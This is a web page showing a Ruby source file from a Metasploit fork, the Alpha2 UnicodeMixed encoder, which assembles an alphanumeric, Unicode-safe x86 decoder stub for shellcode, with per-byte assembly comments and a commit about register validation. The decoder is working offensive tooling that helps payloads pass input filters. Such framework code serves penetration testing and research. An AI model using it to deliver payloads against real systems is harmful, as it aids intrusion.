adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
50cb724846d959cd2cdb98610bb4ece2de84ae1c
metasploit-gs/lib/rex/encoder/alpha2/unicode_mixed.rb
T
sinn3r 192279544b BufferRegister should be validated. 
If BufferRegister is in lower-case, then gen_decoder_prefix will
return nil.  When the return value is nil, other functions like
gen_decoder() will backtrace due to a "undefined method "+" for nil"
error.  Therefore, this input should NOT be case-sensitive.

Also, if for some reason the user supplies an invalid BufferRegister,
the function should be aware of that and warn the user about the
bad input.
2013-01-10 17:14:38 -06:00

118 lines
3.7 KiB
Ruby
Raw Blame History

#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
module Rex
module Encoder
module Alpha2
class UnicodeMixed < Generic
def self.gen_second(block, base)
# unicode uses additive encoding
(block - base)
end
def self.gen_decoder_prefix(reg, offset)
if (offset > 21)
raise "Critical: Offset is greater than 21"
end
# offset untested for unicode :(
if (offset <= 14)
nop = 'CP' * offset
mod = 'IA' * (14 - offset) + nop # dec ecx,,, push ecx, pop edx
else
mod = 'AA' * (offset - 14) # inc ecx
nop = 'CP' * (14 - mod.length)
mod += nop
end
regprefix = { # nops ignored below
'EAX' => 'PPYA' + mod, # push eax, pop ecx
'ECX' => mod + "4444", # dec ecx
'EDX' => 'RRYA' + mod, # push edx, pop ecx
'EBX' => 'SSYA' + mod, # push ebx, pop ecx
'ESP' => 'TUYA' + mod, # push esp, pop ecx
'EBP' => 'UUYA' + mod, # push ebp, pop ecx
'ESI' => 'VVYA' + mod, # push esi, pop ecx
'EDI' => 'WWYA' + mod, # push edi, pop edi
}
prefix = regprefix[reg.upcase]
if prefix.nil?
raise "Critical: Invalid register"
end
return prefix
end
def self.gen_decoder(reg, offset)
decoder =
gen_decoder_prefix(reg, offset) +
"j" + # push 0
"XA" + # pop eax, NOP
"QA" + # push ecx, NOP
"DA" + # inc esp, NOP
"ZA" + # pop edx, NOP
"BA" + # inc edx, NOP
"RA" + # push edx, NOP
"LA" + # dec esp, NOP
"YA" + # pop ecx, NOP
"IA" + # dec ecx, NOP
"QA" + # push ecx, NOP
"IA" + # dec ecx, NOP
"QA" + # push ecx, NOP
"IA" + # dec ecx, NOP
"hAAA" + # push 00410041, NOP
"Z" + # pop edx
"1A" + # add [ecx], dh NOP
"IA" + # dec ecx, NOP
"IA" + # dec ecx, NOP
"J" + # dec edx
"1" + # add [ecx], dh
"1A" + # add [ecx], dh NOP
"IA" + # dec ecx, NOP
"IA" + # dec ecx, NOP
"BA" + # inc edx, NOP
"BA" + # inc edx, NOP
"B" + # inc edx
"Q" + # add [ecx], dl
"I" + # dec ecx
"1A" + # add [ecx], dh NOP
"I" + # dec ecx
"Q" + # add [ecx], dl
"IA" + # dec ecx, NOP
"I" + # dec ecx
"Q" + # add [ecx], dh
"I" + # dec ecx
"1" + # add [ecx], dh
"1" + # add [ecx], dh
"1A" + # add [ecx], dh NOP
"IA" + # dec ecx, NOP
"J" + # dec edx
"Q" + # add [ecx], dl
"YA" + # pop ecx, NOP
"Z" + # pop edx
"B" + # add [edx], al
"A" + # inc ecx <-------
"B" + # add [edx], al |
"A" + # inc ecx |
"B" + # add [edx], al |
"A" + # inc ecx |
"B" + # add [edx], al |
"A" + # inc ecx |
"B" + # add [edx], al |
"kM" + # imul eax, [eax], 10 * |
"A" + # add [edx], al |
"G" + # inc edi |
"B" + # add [edx], al |
"9" + # cmp [eax], eax |
"u" + # jnz ------------------
"4JB"
return decoder
end
end end end end
Reference in New Issue View Git Blame Copy Permalink